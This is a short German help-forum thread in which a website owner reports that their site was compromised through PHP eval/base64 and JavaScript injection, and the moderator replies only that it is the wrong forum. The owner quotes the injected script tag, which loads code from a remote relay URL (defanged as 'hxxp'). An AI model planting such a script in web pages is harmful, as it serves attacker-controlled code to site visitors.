Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Website wurde gehackt

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 02.07.2014, 18:35   #1
bf109
 
Website wurde gehackt - Standard

Website wurde gehackt



Guten Tag zusammen,


ich hoffe ich habe das richtige Forum bzw. Unterforum für meine Art von Problem gefunden.

Meine Website wurde gehackt, mit hilfe von php, eval(base64_decode) Javascript. Ich habe alles gelöscht und ein Backup hochgeladen, FTP Passwörter geändert usw.

Mein Problem ist also behoben soweit. Alles was ich nun gerne wissen möchte ist, ob ich den Verursacher irgendwie auftreiben kann bzw. zurückverfolgen?

Ich habe folgenden Schnipsel zuordnen können, es wird folgendermaßen auf eine Seite verwiesen, die ich nicht öffnen möchte bzw. ich trau mich nicht. (ich kenne mich mit javascript auch überhaupt nicht aus)



Zitat:


<script type=\"text/javascript\" src=\"hxxp://arte.helenparkhurst.net/relay.php?id=16975570\"></script>

Darüber hinaus würde ich gerne wissen: Warum mach jmd. so etwas? Verbreitet der nur Viren oder hat der etwas anderes davon?

Viele Grüße

bf109

Alt 02.07.2014, 19:36   #2
schrauber
/// the machine
/// TB-Ausbilder
 

Website wurde gehackt - Standard

Website wurde gehackt



Hi,

falsches Forum, sorry. Bereinigen von Rechnern, da können wir helfen, dabei aber nicht.
__________________

__________________

Antwort

Themen zu Website wurde gehackt
anderes, backup, folgende, forum, ftp, gehackt, gelöscht, geändert, guten, hacker angriff, hoffe, nicht öffnen, passwörter, problem, seite, unterforum, verbreitet, verursacher, viren, warum, website, wissen, würde, überhaupt, zuordnen, zurückverfolgen, zusammen, öffnen




Ähnliche Themen: Website wurde gehackt


  1. Wurde gehackt
    Plagegeister aller Art und deren Bekämpfung - 21.06.2014 (1)
  2. Website Drupal.org gehackt, Zugriff auf rund eine Million Nutzerdaten
    Nachrichten - 30.05.2013 (0)
  3. wurde ich gehackt?
    Plagegeister aller Art und deren Bekämpfung - 31.12.2012 (6)
  4. Die Navigation zur Website wurde abgebrochen
    Plagegeister aller Art und deren Bekämpfung - 10.10.2012 (7)
  5. Navigation zur Website wurde abgebrochen - nach Neustart geht nichts mehr
    Plagegeister aller Art und deren Bekämpfung - 03.10.2012 (4)
  6. Joomla-Website 3x gehackt - lt. Admin Trojaner auf meinem PC?
    Plagegeister aller Art und deren Bekämpfung - 17.08.2012 (18)
  7. WOW Account wurde gehackt!
    Plagegeister aller Art und deren Bekämpfung - 29.03.2012 (34)
  8. Ich Wurde gehackt! und nun?
    Antiviren-, Firewall- und andere Schutzprogramme - 01.06.2011 (4)
  9. wurde gehackt
    Log-Analyse und Auswertung - 05.08.2010 (3)
  10. PC wurde gehackt
    Log-Analyse und Auswertung - 16.06.2010 (2)
  11. ich wurde gehackt in wow
    Plagegeister aller Art und deren Bekämpfung - 21.05.2010 (4)
  12. Computer wurde gehackt!!!
    Plagegeister aller Art und deren Bekämpfung - 13.09.2009 (9)
  13. Ich wurde gehackt
    Plagegeister aller Art und deren Bekämpfung - 28.04.2009 (1)
  14. Wurde gehackt
    Log-Analyse und Auswertung - 09.03.2009 (5)
  15. Acc wurde gehackt.......;-(
    Mülltonne - 12.12.2008 (0)
  16. Ich wurde gehackt ?
    Plagegeister aller Art und deren Bekämpfung - 24.05.2008 (4)
  17. Wurde gehackt!
    Antiviren-, Firewall- und andere Schutzprogramme - 09.09.2006 (16)

Zum Thema Website wurde gehackt - Guten Tag zusammen, ich hoffe ich habe das richtige Forum bzw. Unterforum für meine Art von Problem gefunden. Meine Website wurde gehackt, mit hilfe von php, eval(base64_decode) Javascript. Ich habe - Website wurde gehackt...
Archiv
Du betrachtest: Website wurde gehackt auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.